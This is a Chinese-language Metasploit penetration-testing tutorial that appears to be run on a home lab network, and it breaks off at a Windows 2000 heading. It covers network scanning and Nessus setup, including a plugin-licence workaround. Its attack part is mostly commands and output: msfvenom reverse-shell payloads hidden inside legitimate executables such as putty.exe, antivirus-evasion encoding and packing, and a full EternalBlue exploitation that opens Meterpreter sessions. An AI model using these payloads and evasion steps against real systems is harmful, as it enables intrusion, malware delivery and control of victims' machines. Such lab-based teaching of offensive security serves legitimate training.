msf6 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ftp/ftp_versionmsf6 auxiliary(scanner/ftp/ftp_version) > set threads 50threads => 50msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/mssql/mssql_ping) > use auxiliary/scanner/ftp/ftp_versionmsf6 auxiliary(scanner/ftp/ftp_version) > set threads 50threads => 50msf6 auxiliary(scanner/ftp/ftp_version) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/ftp/ftp_version) > run[*] 192.168.0.1/24:21     - Scanned  45 of 256 hosts (17% complete)[*] 192.168.0.1/24:21     - Scanned  55 of 256 hosts (21% complete)[*] 192.168.0.1/24:21     - Scanned  99 of 256 hosts (38% complete)[+] 192.168.0.106:21      - FTP Banner: '220-FileZilla Server version 0.9.41 betax0dx0a220-written by Tim Kosse (Tim.Kosse@gmx.de)x0dx0a220 Please visit http://sourceforge.net/projects/filezilla/x0dx0a'[+] 192.168.0.150:21      - FTP Banner: '220 (vsFTPd 3.0.3)x0dx0a'[*] 192.168.0.1/24:21     - Scanned 104 of 256 hosts (40% complete)[+] 192.168.0.161:21      - FTP Banner: '220 (vsFTPd 2.3.4)x0dx0a'[*] 192.168.0.1/24:21     - Scanned 144 of 256 hosts (56% complete)[*] 192.168.0.1/24:21     - Scanned 154 of 256 hosts (60% complete)[*] 192.168.0.1/24:21     - Scanned 203 of 256 hosts (79% complete)[*] 192.168.0.1/24:21     - Scanned 205 of 256 hosts (80% complete)[*] 192.168.0.1/24:21     - Scanned 253 of 256 hosts (98% complete)[*] 192.168.0.1/24:21     - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completedmsf6 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous msf6 auxiliary(scanner/ftp/anonymous) > set rhost 192.168.0.161rhost => 192.168.0.150msf6 auxiliary(scanner/ftp/anonymous) > run[+] 192.168.0.161:21      - 192.168.0.161:21 - Anonymous READ (220 (vsFTPd 2.3.4))[*] 192.168.0.161:21      - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed结论:192.168.0.161的FTP允许匿名登录

SNMP扫描

msf6 auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/snmp/snmp_loginmsf6 auxiliary(scanner/snmp/snmp_login) > set rhost 192.168.0.1/24rhost => 192.168.0.1/24msf6 auxiliary(scanner/snmp/snmp_login) > set threads 50threads => 50msf6 auxiliary(scanner/snmp/snmp_login) > run[*] Scanned  50 of 256 hosts (19% complete)[*] Scanned  54 of 256 hosts (21% complete)[*] Scanned 100 of 256 hosts (39% complete)[*] Scanned 104 of 256 hosts (40% complete)[*] Scanned 134 of 256 hosts (52% complete)[*] Scanned 157 of 256 hosts (61% complete)[*] Scanned 181 of 256 hosts (70% complete)[*] Scanned 208 of 256 hosts (81% complete)[*] Scanned 231 of 256 hosts (90% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

ARP 扫描

msf6 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/discovery/arp_sweepmsf6 auxiliary(scanner/discovery/arp_sweep) > optionsModule options (auxiliary/scanner/discovery/arp_sweep):   Name       Current Setting  Required  Description   ----       ---------------  --------  -----------   INTERFACE                   no        The name of the interface   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   SHOST                       no        Source IP Address   SMAC                        no        Source MAC Address   THREADS    1                yes       The number of concurrent threads (max one per host)   TIMEOUT    5                yes       The number of seconds to wait for new datamsf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.0.1/24RHOSTS => 192.168.0.1/24msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/discovery/arp_sweep) > run[+] 192.168.0.1 appears to be up (UNKNOWN).[+] 192.168.0.106 appears to be up (UNKNOWN).[+] 192.168.0.150 appears to be up (VMware, Inc.).[+] 192.168.0.151 appears to be up (UNKNOWN).[+] 192.168.0.152 appears to be up (UNKNOWN).[+] 192.168.0.158 appears to be up (UNKNOWN).[+] 192.168.0.159 appears to be up (UNKNOWN).[+] 192.168.0.161 appears to be up (VMware, Inc.).[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

HTTP服务扫描

msf6 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/http/http_versionmsf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.0.1/24RHOSTS => 192.168.0.1/24msf6 auxiliary(scanner/http/http_version) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/http/http_version) > run[+] 192.168.0.1:80[*] Scanned  44 of 256 hosts (17% complete)[*] Scanned  55 of 256 hosts (21% complete)[*] Scanned  78 of 256 hosts (30% complete)[+] 192.168.0.106:80 Microsoft-HTTPAPI/2.0[*] Scanned 104 of 256 hosts (40% complete)[+] 192.168.0.161:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )[*] Scanned 136 of 256 hosts (53% complete)[*] Scanned 175 of 256 hosts (68% complete)[*] Scanned 187 of 256 hosts (73% complete)[*] Scanned 209 of 256 hosts (81% complete)[*] Scanned 235 of 256 hosts (91% complete)[*] Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

SMB扫描

SMB:SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application layer)的协议。

SMB使用了NetBIOS的应用程序接口 (Application Program Interface,简称API)。另外,它是一个开放性的协议,允许了协议扩展——使得它变得更大而且复杂;大约有65个最上层的作业,而每个作业都超过120个函数,甚至Windows NT也没有全部支持到,最近微软又把 SMB 改名为 CIFS(Common Internet File System),并且加入了许多新的特色。

SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统

msf6 auxiliary(scanner/http/http_version) > use auxiliary/scanner/smb/smb_versionmsf6 auxiliary(scanner/smb/smb_version) > set THREADS 100THREADS => 100msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.0.1/24RHOSTS => 192.168.0.1/24msf6 auxiliary(scanner/smb/smb_version) > run[*] 192.168.0.1/24:       - Scanned  39 of 256 hosts (15% complete)[*] 192.168.0.1/24:       - Scanned  60 of 256 hosts (23% complete)[*] 192.168.0.151:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{d6d3c52d-ff47-48d3-aa4f-7ac8c44d7d96}) (authentication domain:LAPTOP-PH3NSDV2)[*] 192.168.0.106:445     - SMB Detected (versions:2, 3) (preferred dialect:SMB 3.1.1) (compression capabilities:LZNT1) (encryption capabilities:AES-128-GCM) (signatures:optional) (guid:{c4aea85c-fbd7-47a2-b5b5-f6ad41c48b6e}) (authentication domain:DESKTOP-9A8VFKB)[*] 192.168.0.1/24:       - Scanned 104 of 256 hosts (40% complete)[*] 192.168.0.158:445     - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:4d 1h 5m 2s) (guid:{10a33533-6e55-452c-9c62-13561aafa6e1}) (authentication domain:WIN-2VEIIKHJ7M8)[+] 192.168.0.158:445     -   Host is running Windows 7 Home Basic SP1 (build:7601) (name:WIN-2VEIIKHJ7M8) (workgroup:WORKGROUP)[*] 192.168.0.161:445     - SMB Detected (versions:1) (preferred dialect:) (signatures:optional)[*] 192.168.0.161:445     -   Host could not be identified: Unix (Samba 3.0.20-Debian)[*] 192.168.0.1/24:       - Scanned 107 of 256 hosts (41% complete)[*] 192.168.0.1/24:       - Scanned 159 of 256 hosts (62% complete)[*] 192.168.0.1/24:       - Scanned 161 of 256 hosts (62% complete)[*] 192.168.0.1/24:       - Scanned 203 of 256 hosts (79% complete)[*] 192.168.0.1/24:       - Scanned 206 of 256 hosts (80% complete)[*] 192.168.0.1/24:       - Scanned 254 of 256 hosts (99% complete)[*] 192.168.0.1/24:       - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

漏洞扫描

Nexpose

# wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux64.bin#chmod a+x NeXposeSetup-Linux64.bin#./NeXposeSetup-Linux64.bin#cd /opt/rapid7/nexpose/nsc#./nsc

https://127.0.0.1:3780/ 登录页面出来后就ok了。

Nessus

https://blog.csdn.net/qq_51577576/article/details/123211031

1)https://www.tenable.com/downloads/nessus

2)dpkg -i Nessus-10.2.0-debian9_amd64.deb

3)/bin/systemctl start nessusd.service

或

systemctl start nessusd.service

4)https://127.0.0.1:8834/

5)关闭服务:systemctl stop nessusd.service

6)#gedit /opt/nessus/var/nessus/plugin_feed_info.inc7)添加内容PLUGIN_SET = "202201250216";PLUGIN_FEED = "ProfessionalFeed (Direct)";PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";8)# cd /opt/nessus/var/nessus/# mkdir plugins#cp /opt/nessus/var/nessus/plugin_feed_info.inc /opt/nessus/var/nessus/plugins/9)更新https://pan.baidu.com/s/11sV9Kk0mbzQkLcXqUKxO_g?pwd=462u#/opt/nessus/sbin/nessuscli update all-2.0-20220209.tar.gzmsf6 > db_connect postgres:123456@127.0.0.1/msf[*] Connected to Postgres data service: 127.0.0.1/msfmsf6 >db_status[*] Connected to msf. Connection type: postgresql. Connection name: local_db_service.msf6 > db_import /home/jerry/jerry_01sqgv.nessus[*] Importing 'Nessus XML (v2)' data[*] Importing host 192.168.0.158[*] Importing host 192.168.0.157[*] Importing host 192.168.0.151[*] Importing host 192.168.0.150[*] Importing host 192.168.0.106[*] Importing host 192.168.0.1[*] Successfully imported /home/jerry/jerry_01sqgv.nessusmsf6 > hosts -c address,svcs,vulnsHosts=====addresssvcs  vulns-----------  -----192.168.0.12 14192.168.0.106  2376192.168.0.150  6 46192.168.0.151  4 28192.168.0.155  3 2192.168.0.157  4 29192.168.0.158  1037

address:IP地址

svcs:探测到的服务数量

vulns:Nessus发现到的漏洞个数

展示所有漏洞

msf6 > vulns

专门漏洞扫描

验证SMB登录

msf6 > use auxiliary/scanner/smb/smb_loginmsf6 auxiliary(scanner/smb/smb_login) > show optionsmsf6 auxiliary(scanner/smb/smb_login) > set rhost 192.168.0.106-200rhost => 192.168.0.106-200msf6 auxiliary(scanner/smb/smb_login) > set smbuser rootsmbuser => rootmsf6 auxiliary(scanner/smb/smb_login) > set smbupass 123456smbupass => 123456msf6 auxiliary(scanner/smb/smb_login) > ser verbose false[-] Unknown command: sermsf6 auxiliary(scanner/smb/smb_login) > run

扫描开放的VNC空口令

VNC (Virtual Network Console)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的 AT&T 的欧洲研究实验室开发的。VNC 是在基于 UNIX 和 Linux 操作系统的免费的开源软件,远程控制能力强大,高效实用,其性能可以和 Windows 和 MAC 中的任何远程控制软件媲美。在 Linux 中,VNC 包括以下四个命令:vncserver,vncviewer,vncpasswd,和 vncconnect。大多数情况下用户只需要其中的两个命令:vncserver 和 vncviewer。

msf6 auxiliary(scanner/smb/smb_login) > use auxiliary/scanner/vnc/vnc_none_authmsf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhost 192.168.0.106-200msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100threads => 100msf6 auxiliary(scanner/vnc/vnc_none_auth) > run

扫描开放的X11服务器

X11也叫做X Window系统,X Window系统 (X11或X)是一种位图显示的视窗系统。它是在 Unix 和类Unix 操作系统,以及 OpenVMS 上建立图形用户界面的标准工具包和协议,并可用于几乎所有已有的现代操作系统。

msf6 auxiliary(scanner/vnc/vnc_none_auth) > use auxiliary/scanner/x11/open_x11msf6 auxiliary(scanner/x11/open_x11) > set rhost 192.168.0.106/24rhost => 192.168.0.106/24msf6 auxiliary(scanner/x11/open_x11) > set threads 100threads => 100msf6 auxiliary(scanner/x11/open_x11) > run[*] 192.168.0.106/24:6000 - Scanned  31 of 256 hosts (12% complete)[*] 192.168.0.106/24:6000 - Scanned  53 of 256 hosts (20% complete)[*] 192.168.0.106/24:6000 - Scanned 102 of 256 hosts (39% complete)[-] 192.168.0.157:6000- 192.168.0.157 Access Denied[*] 192.168.0.106/24:6000 - Scanned 105 of 256 hosts (41% complete)[*] 192.168.0.106/24:6000 - Scanned 200 of 256 hosts (78% complete)[*] 192.168.0.106/24:6000 - Scanned 204 of 256 hosts (79% complete)[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)[*] 192.168.0.106/24:6000 - Scanned 223 of 256 hosts (87% complete)[*] 192.168.0.106/24:6000 - Scanned 254 of 256 hosts (99% complete)[*] 192.168.0.106/24:6000 - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed

开启渗透之旅

msf6常用命令

msf6 >show exploits 显示所有的攻击模块

msf6 > show exploitsExploits========# Name  Disclosure Date  Rank   Check  Description- ---- ---------------  ----   -----  -----------0 exploit/aix/local/ibstat_path  2013-09-24   excellent  Yesibstat $PATH Privilege Escalation1 exploit/aix/local/xorg_x11_server 2018-10-25   great  YesXorg X11 Server Local Privilege Escalation2 exploit/aix/rpc_cmsd_opcode21  2009-10-07   great  No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow3 exploit/aix/rpc_ttdbserverd_realpath   2009-06-17   great  No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)4 exploit/android/adb/adb_server_exec   2016-01-01   excellent  YesAndroid ADB Debug Server Remote Payload Execution5 exploit/android/browser/samsung_knox_smdm_url   2014-11-12   excellent  No Samsung Galaxy KNOX Android Browser RCE6 exploit/android/browser/stagefright_mp4_tx3g_64bit  2015-08-13   normal No Android Stagefright MP4 tx3g Integer Overflow…

msf6 > show auxiliaryAuxiliary=========   # Name Disclosure Date  RankCheck  Description   - ---- ---------------  ---------  -----------0 auxiliary/admin/2wire/xslt_password_reset   2007-08-15normal  No 2Wire Cross-Site Request Forgery Password Reset Vulnerability1 auxiliary/admin/android/google_play_store_uxss_xframe_rce normal  No Android Browser RCE Through Google Play Store XFO2 auxiliary/admin/appletv/appletv_display_image normal  No Apple TV Image Remote Control3 auxiliary/admin/appletv/appletv_display_video normal  No Apple TV Video Remote Control4 auxiliary/admin/atg/atg_clientnormal  No Veeder-Root Automatic Tank Gauge (ATG) Administrative Client…

msf6 > show optionsmsf6 > use auxiliary/scanner/x11/open_x11msf6 auxiliary(scanner/x11/open_x11) > backmsf6 >search mysql

msf6 > search ms08_067Matching Modules================#  Name Disclosure Date  Rank   Check  Description-  ---- ---------------  ----   -----  -----------0  exploit/windows/smb/ms08_067_netapi  2008-10-28   great  YesMS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting  Required  Description---- ---------------  --------  -----------RHOSTSyes   The target host(s), see https://github.com/rapid7/metas   ploit-framework/wiki/Using-MetasploitRPORT445  yes   The SMB service port (TCP)SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name  Current Setting  Required  Description----  ---------------  --------  -----------EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)LHOST 192.168.0.150yes   The listen address (an interface may be specified)LPORT 4444 yes   The listen portExploit target:Id  Name--  ----0   Automatic Targetingmsf>show payloads

显示某个模块下的payload

msf6 > use exploit/windows/smb/ms08_067_netapi[*] Using configured payload windows/meterpreter/reverse_tcpmsf6 exploit(windows/smb/ms08_067_netapi) > show payloads

使用某个payload

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcppayload => windows/shell/reverse_tcpmsf>show targetsmsf6 exploit(windows/smb/ms08_067_netapi) > show targetsExploit targets:   Id  Name   --  ----   0   Automatic Targeting   1   Windows 2000 Universal   2   Windows XP SP0/SP1 Universal   3   Windows 2003 SP0 Universal   4   Windows XP SP2 English (AlwaysOn NX)   5   Windows XP SP2 English (NX)   …   79  Windows 2003 SP2 Russian (NX)   80  Windows 2003 SP2 Swedish (NX)   81  Windows 2003 SP2 Turkish (NX)

显示更详细的show targets内容

msf6 exploit(windows/smb/ms08_067_netapi) > infoName: MS08-067 Microsoft Server Service Relative Path Stack CorruptionModule: exploit/windows/smb/ms08_067_netapiPlatform: WindowsArch:Privileged: YesLicense: Metasploit Framework License (BSD)Rank: GreatDisclosed: 2008-10-28Provided by:hdmBrett Moore brett.moore@insomniasec.comfrank2jduckAvailable targets:   Id  Name   --  ----   0   Automatic Targeting   1   Windows 2000 Universal   2   Windows XP SP0/SP1 Universal   3   Windows 2003 SP0 Universal   4   Windows XP SP2 English (AlwaysOn NX)   5   Windows XP SP2 English (NX)   …   79  Windows 2003 SP2 Russian (NX)   80  Windows 2003 SP2 Swedish (NX)   81  Windows 2003 SP2 Turkish (NX)Check supported:  YesBasic options:  Name Current Setting  Required  Description  ---- ---------------  --------  -----------  RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit  RPORT445  yes   The SMB service port (TCP)  SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload information:  Space: 408  Avoid: 8 charactersDescription:  This module exploits a parsing flaw in the path canonicalization   code of NetAPI32.dll through the Server Service. This module is   capable of bypassing NX on some operating systems and service packs.  The correct target must be used to prevent the Server Service (along   with a dozen others in the same process) from crashing. Windows XP   targets seem to handle multiple successful exploitation events, but   2003 targets will often crash or hang on subsequent attempts. This   is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development.References:  https://nvd.nist.gov/vuln/detail/CVE-2008-4250  OSVDB (49243)  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 192.168.0.105lhost => 192.168.0.105msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name Current Setting  Required  Description   ---- ---------------  --------  -----------   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   RPORT445  yes   The SMB service port (TCP)   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell/reverse_tcp):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)   LHOST 192.168.0.105yes   The listen address (an interface may be specified)   LPORT 4444 yes   The listen portExploit target:   Id  Name   --  ----   0   Automatic Targetingmsf6 exploit(windows/smb/ms08_067_netapi) > unset lhostUnsetting lhost...msf6 exploit(windows/smb/ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):   Name Current Setting  Required  Description   ---- ---------------  --------  -----------   RHOSTSyes   The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit   RPORT445  yes   The SMB service port (TCP)   SMBPIPE  BROWSER  yes   The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell/reverse_tcp):   Name  Current Setting  Required  Description   ----  ---------------  --------  -----------   EXITFUNC  thread   yes   Exit technique (Accepted: '', seh, thread, process, none)   LHOST  yes   The listen address (an interface may be specified)   LPORT 4444 yes   The listen portExploit target:   Id  Name   --  ----   0   Automatic Targeting

设置所有模块的lhost

msf6 exploit(windows/smb/ms08_067_netapi) > setg lhost 102.168.0.150lhost => 102.168.0.150msf6 exploit(windows/smb/ms08_067_netapi) > unsetg lhost

免杀技术

msfvenom

Options:

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=9999 R > test.apk

躲避杀毒软件的监测

使用MSF编码器

 # msfvenom -l encodersFramework Encoders [--encoder]======================================    x86/shikata_ga_nai       excellent  Polymorphic XOR Additive Feedback Encoder    x86/single_static_bit      manual     Single Static Bit    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder    x86/xor_dynamic         normal     Dynamic key XOR Encodermsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload.exe

自定义可自行文件模板

wget http://download.sysinternals.com/files/ProcessExplorer.zip(也可以从国内网站上取)

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0axff' -i 10 -f exe -o payload1.exeFound 1 compatible encodersAttempting to encode payload with 10 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 381 (iteration=0)x86/shikata_ga_nai succeeded with size 408 (iteration=1)x86/shikata_ga_nai succeeded with size 435 (iteration=2)x86/shikata_ga_nai succeeded with size 462 (iteration=3)x86/shikata_ga_nai succeeded with size 489 (iteration=4)x86/shikata_ga_nai succeeded with size 516 (iteration=5)x86/shikata_ga_nai succeeded with size 543 (iteration=6)x86/shikata_ga_nai succeeded with size 570 (iteration=7)x86/shikata_ga_nai succeeded with size 597 (iteration=8)x86/shikata_ga_nai succeeded with size 624 (iteration=9)x86/shikata_ga_nai chosen with final size 624Payload size: 624 bytesFinal size of exe file: 2661376 bytesSaved as: payload1.exe

将payload1.exe上传到windows下

# msfconsolemsf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.106[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:30805) at 2022-06-28 17:03:05 +0800meterpreter > pwdC:UsersxiangDesktop

隐秘地启动一个攻击负载

msfvenom -a x86 --platform Windows -x ProcessExplorer/procexp.exe -p windows/meterpreter/reverse_tcp LHOST=192.168.0.150 LPORT=4444 -e x86/shikata_ga_nai -x putty.exe -k -b 'x00x0axff' -i 10 -f exe -o payload2.exeFound 1 compatible encodersAttempting to encode payload with 10 iterations of x86/shikata_ga_naix86/shikata_ga_nai succeeded with size 381 (iteration=0)x86/shikata_ga_nai succeeded with size 408 (iteration=1)x86/shikata_ga_nai succeeded with size 435 (iteration=2)x86/shikata_ga_nai succeeded with size 462 (iteration=3)x86/shikata_ga_nai succeeded with size 489 (iteration=4)x86/shikata_ga_nai succeeded with size 516 (iteration=5)x86/shikata_ga_nai succeeded with size 543 (iteration=6)x86/shikata_ga_nai succeeded with size 570 (iteration=7)x86/shikata_ga_nai succeeded with size 597 (iteration=8)x86/shikata_ga_nai succeeded with size 624 (iteration=9)x86/shikata_ga_nai chosen with final size 624Payload size: 624 bytesFinal size of exe file: 702464 bytesSaved as: payload2.exe

将payload2.exe上传到windows下

msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set lhost 192.168.0.150lhost => 192.168.0.150msf6 exploit(multi/handler) > set lport 4444lport => 4444msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > run[*] Started reverse TCP handler on 192.168.0.150:4444[*] Sending stage (175686 bytes) to 192.168.0.158[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:50055) at 2022-06-28 17:23:50 +0800meterpreter >

加壳

upx

#upx                       Ultimate Packer for eXecutables                          Copyright (C) 1996 - 2020UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..Commands:  -1     compress faster                   -9    compress better  -d     decompress                      -l    list compressed file  -t     test compressed file                -V    display version number  -h     give more help                   -L    display software licenseOptions:  -q     be quiet                         -v    be verbose  -oFILE write output to 'FILE'  -f     force compression of suspicious files  -k     keep backup filesfile..   executables to (de)compressType 'upx --help' for more detailed help.UPX comes with ABSOLUTELY NO WARRANTY; for details visit https://upx.github.io

开始渗透

利用主机漏洞渗透

利用操作系统漏洞

Windows 7

msf6 > nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24[*] exec: nmap -sT -A --script=smb-vuln-ms17-010 -P0 192.168.0.1/24Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 16:07 CSTNmap scan report for 192.168.0.1…Nmap scan report for 192.168.0.158…| smb-vuln-ms17-010:|   VULNERABLE:|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)| State: VULNERABLE| IDs:  CVE:CVE-2017-0143| Risk factor: HIGH…msf6 > search ms17-010Matching Modules================   #  Name  Disclosure Date  Rank Check  Description   -  ----  ---------------  ---- -----  -----------   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14   average  YesMS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption   1  exploit/windows/smb/ms17_010_psexec   2017-03-14   normal   YesMS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution   2  auxiliary/admin/smb/ms17_010_command  2017-03-14   normal   No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution   3  auxiliary/scanner/smb/smb_ms17_010 normal   No MS17-010 SMB RCE Detection   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14   greatYesSMB DOUBLEPULSAR Remote Code ExecutionInteract with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rcemsf6 > use 0[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.158rhost => 192.168.0.158msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.0.150:4444[*] 192.168.0.158:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 192.168.0.158:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x64 (64-bit)[*] 192.168.0.158:445 - Scanned 1 of 1 hosts (100% complete)[+] 192.168.0.158:445 - The target is vulnerable.[*] 192.168.0.158:445 - Connecting to target for exploitation.[+] 192.168.0.158:445 - Connection established for exploitation.[+] 192.168.0.158:445 - Target OS selected valid for OS indicated by SMB reply[*] 192.168.0.158:445 - CORE raw buffer dump (40 bytes)[*] 192.168.0.158:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42  Windows 7 Home B[*] 192.168.0.158:445 - 0x00000010  61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63  asic 7601 Servic[*] 192.168.0.158:445 - 0x00000020  65 20 50 61 63 6b 20 31  e Pack 1[+] 192.168.0.158:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 192.168.0.158:445 - Trying exploit with 12 Groom Allocations.[*] 192.168.0.158:445 - Sending all but last fragment of exploit packet[*] 192.168.0.158:445 - Starting non-paged pool grooming[+] 192.168.0.158:445 - Sending SMBv2 buffers[+] 192.168.0.158:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 192.168.0.158:445 - Sending final SMBv2 buffers.[*] 192.168.0.158:445 - Sending last fragment of exploit packet![*] 192.168.0.158:445 - Receiving response from exploit packet[+] 192.168.0.158:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 192.168.0.158:445 - Sending egg to corrupted connection.[*] 192.168.0.158:445 - Triggering free of corrupted buffer.[*] Sending stage (200262 bytes) to 192.168.0.158[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49667 ) at 2022-06-23 16:32:15 +0800[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 192.168.0.158:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter >

Windows 2000

